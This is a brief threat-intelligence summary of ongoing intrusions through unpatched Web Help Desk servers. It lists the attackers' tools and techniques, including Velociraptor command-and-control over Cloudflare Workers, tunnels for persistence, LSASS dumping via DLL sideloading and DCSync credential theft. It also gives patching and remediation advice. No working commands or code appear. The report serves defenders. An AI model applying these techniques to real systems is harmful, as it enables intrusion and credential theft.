Overview
- Microsoft and Huntress report ongoing intrusions through internet‑exposed, unpatched Web Help Desk servers, with the specific initial vulnerability still unconfirmed across cases.
- After access, attackers deploy Zoho Assist/ManageEngine for unattended remote control and conduct Active Directory discovery with hands‑on‑keyboard activity.
- Threat actors use Velociraptor as a command‑and‑control framework via Cloudflare Workers and add Cloudflared tunnels for redundant persistence, in some cases using an outdated Velociraptor build with a known privilege escalation flaw.
- Observed tradecraft includes PowerShell leveraging BITS for payloads, DLL sideloading via wab.exe to dump LSASS, reverse SSH/RDP access, QEMU‑based scheduled tasks for stealth, and at least one DCSync credential theft.
- CISA added CVE‑2025‑40551 to its Known Exploited Vulnerabilities list as vendors advise upgrading WHD to 2026.1 or later, removing public admin access, rotating credentials, and evicting unauthorized tools, with Huntress noting incidents across three of its 78 WHD customers.